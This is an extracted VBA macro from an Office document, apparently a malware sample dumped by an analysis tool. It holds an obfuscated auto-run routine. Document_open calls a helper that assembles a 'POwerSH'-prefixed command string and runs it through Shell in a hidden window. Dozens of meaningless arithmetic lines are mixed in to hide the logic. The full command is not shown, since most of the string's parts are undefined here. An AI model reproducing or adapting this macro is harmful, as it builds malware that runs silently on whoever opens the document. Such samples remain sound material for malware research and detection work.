Filename     : ./macros/c5ee2a7fe74184871f785f99f4eacab8d901c060405cf5b07f11e1b7c6fac04d
OLE stream   : Macros/VBA/JCWBzrKv
VBA filename : JCWBzrKv.cls
----------------------------------------
Attribute VB_Name = "JCWBzrKv"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function NGIkV()
On Error Resume Next
jHipt = Atn(GSWEE + Sin(HiPbn) - 29213 / 22801)
nputI = 82707 + 45191
ijvjdr = 58449 / 49206
oviJG = zojEjH * CSng(84700 * Fix(15192)) * qYGjW + CSng(YHrwT + CLng(UTwpWN)) / (zUiuQp * CSng(17066) - (89962 + Fix(lmuRj) - (73886 + CLng(VBHBS - Log(nnLmw) - 58616 + Int(kPNtt)))))
WZAYX = wqMNn
CmSmi = Atn(obqTri + Sin(IaktRj) - 79366 / 88769)
wQiGl = 82788 + 92566
HSHNld = 59854 / 18671
IbziN = CLuMCi * CSng(64062 * Fix(92918)) * iEdjf + CSng(kbBYV + CLng(PMcsAi)) / (NubSK * CSng(94966) - (650 + Fix(wzLEdC) - (31167 + CLng(CHHQn - Log(AwKsp) - 74731 + Int(SUBANj)))))
QSKBQ = UlFjYF
YGiKSh = Atn(AprIcK + Sin(HRQcl) - 15938 / 61546)
AHnqsj = 15968 + 67981
HLdGz = 51204 / 88356
tLXizi = wKwjP * CSng(51573 * Fix(29397)) * HKvYfa + CSng(VZQRA + CLng(ulvBUj)) / (wdlpq * CSng(39401) - (17280 + Fix(bZbas) - (95666 + CLng(hnjDGn - Log(zNhirC) - 48686 + Int(furqq)))))
iCGGJj = soGwz
Izvltl = Atn(LFisi + Sin(YVcBOi) - 97690 / 88518)
qWOrV = 87280 + 26372
BtIwz = 85398 / 64304
OEizAz = hLhTG * CSng(14121 * Fix(17590)) * VEuaQ + CSng(oiLiz + CLng(pOPdh)) / (ETzYIJ * CSng(64247) - (59254 + Fix(dYdqR) - (63686 + CLng(smbSz - Log(ZaWOA) - 66675 + Int(SvElaD)))))
rQOrI = rqZMsO
NGIkV = iOoSvjhbs + Chr$(dwOwEIALXGf + 80 + wXQPQTTJPu) + "OwerSH" + uOibLE + IzOzajUoCm + dEjCpVqQaro + IzbpPMBjS
vtcwz = Atn(zhwUQ + Sin(ssvZja) - 73461 / 5507)
oWSwJ = 94245 + 36690
hoPKb = 68611 / 47048
XrEvl = CcuoUi * CSng(72474 * Fix(83661)) * UrQalL + CSng(WFfDNX + CLng(zovORT)) / (JwWwp * CSng(26555) - (58633 + Fix(Yjiwv) - (95208 + CLng(sWhqh - Log(wPiji) - 73600 + Int(AYPTXC)))))
TOYsmL = ultWYR
rSjCz = Atn(KUfKXS + Sin(ouNLf) - 94634 / 19381)
NSCtB = 9043 + 99331
WizOS = 37774 / 67266
tlAzOF = mWbZh * CSng(54372 * Fix(11306)) * jGhwiv + CSng(PiuOaz + CLng(ihTAk)) / (nsnzt * CSng(65212) - (97658 + Fix(vzjqH) - (51049 + CLng(nUIUn - Log(VVEzi) - 28819 + Int(otFhrk)))))
tCzXW = UkFXqA
End Function
Function MlPQSMiH(mpWzEO)
On Error Resume Next
zQGpi = Atn(OtjjbC + Sin(liwWR) - 23743 / 12476)
qucMs = 82799 + 86873
jNQoh = 61548 / 81391
tBuamV = moidbS * CSng(72062 * Fix(16260)) * vAMac + CSng(HGJPj + CLng(UCacpV)) / (AEzkF * CSng(69969) - (97072 + Fix(tNZjE) - (72411 + CLng(RriSD - Log(unRWov) - 33522 + Int(DAlwlH)))))
nmTdm = bXcZz
OwtQit = Atn(PWSIO + Sin(wbHwJi) - 7096 / 41335)
uhqNtB = 99423 + 39170
BFjtvV = 21359 / 27024
OiZBB = CpBzI * CSng(45664 * Fix(62648)) * tIZdSH + CSng(usNaWz + CLng(DvfjV)) / (YIuck * CSng(3485) - (47371 + Fix(bcqINk) - (93649 + CLng(UXhMb - Log(mLaiS) - 60165 + Int(FRcBWX)))))
rMLqX = QdhCXo
rQQCf = OIijiVC + Shell(prhwow + mpWzEO + EIBQLCT, 2194 - 2194)
wcnwq = Atn(vfNvi + Sin(zcSVpA) - 34842 / 48392)
WDEni = 18753 + 56508
ZZlint = 2755 / 29895
nUPfvn = pwwEIL * CSng(32926 * Fix(4013)) * IEdif + CSng(Bwtsj + CLng(oHrBkN)) / (svLcq * CSng(68637) - (77525 + Fix(GSjwEB) - (79072 + CLng(ZjvNmT - Log(lCEBA) - 80995 + Int(DYzMJ)))))
zsrVi = twWVXl
End Function
Private Sub Document_open()
On Error Resume Next
iZjMKw = Atn(XhIXb + Sin(Mwbji) - 99923 / 45475)
GaWAN = 74189 + 65444
oLCcCH = 98696 / 74323
zukpXC = QDXtQ * CSng(10426 * Fix(93529)) * mitUbs + CSng(wBsASL + CLng(mjOhZ)) / (zHfKv * CSng(84884) - (62598 + Fix(wiVTK) - (76789 + CLng(WTSGpT - Log(jwWjpE) - 32169 + Int(iifvof)))))
PzEYks = dIzMZ
ZimZO = Atn(ZtWVD + Sin(sssam) - 54876 / 2493)
bRdAii = 14285 + 92679
XADtA = 89446 / 15309
oHPuO = kIrXku * CSng(87200 * Fix(46971)) * rcDEG + CSng(ALJwj + CLng(zBcRfq)) / (LwJpi * CSng(80314) - (86607 + Fix(Hoovi) - (86375 + CLng(ICiCp - Log(nwFwiv) - 71305 + Int(OGFDr)))))
sijrrf = aPFncN
Application.Run CRhLKt + "MlPQSMiH" + AQhStEDGodB, LNYzY + NGIkV + jmIPmTN
XEWoBV = Atn(UkoUT + Sin(Cjibb) - 35144 / 24107)
akscCs = 27387 + 76956
dIjdiq = 62875 / 61140
cCbpZ = tYUFjA * CSng(77714 * Fix(72601)) * KNLSL + CSng(oZBdaT + CLng(XrPiE)) / (GpPpH * CSng(91088) - (43256 + Fix(TWhtlw) - (63317 + CLng(pjvdm - Log(caMzLs) - 2619 + Int(pBwafW)))))
LTKWSc = olSaG
vIUMb = Atn(JbMhP + Sin(QDoXa) - 50320 / 9255)
KqZvaG = 35592 + 39405
Escpfh = 83799 / 45009
NJHuwn = WiVon * CSng(55915 * Fix(3059)) * jkHKn + CSng(zmhBzs + CLng(jQZNc)) / (GAOXf * CSng(72661) - (57154 + Fix(nESoh) - (79260 + CLng(MpzIh - Log(NXZsw) - 88862 + Int(mOvaK)))))
ZIrdRt = rdYkX
End Sub

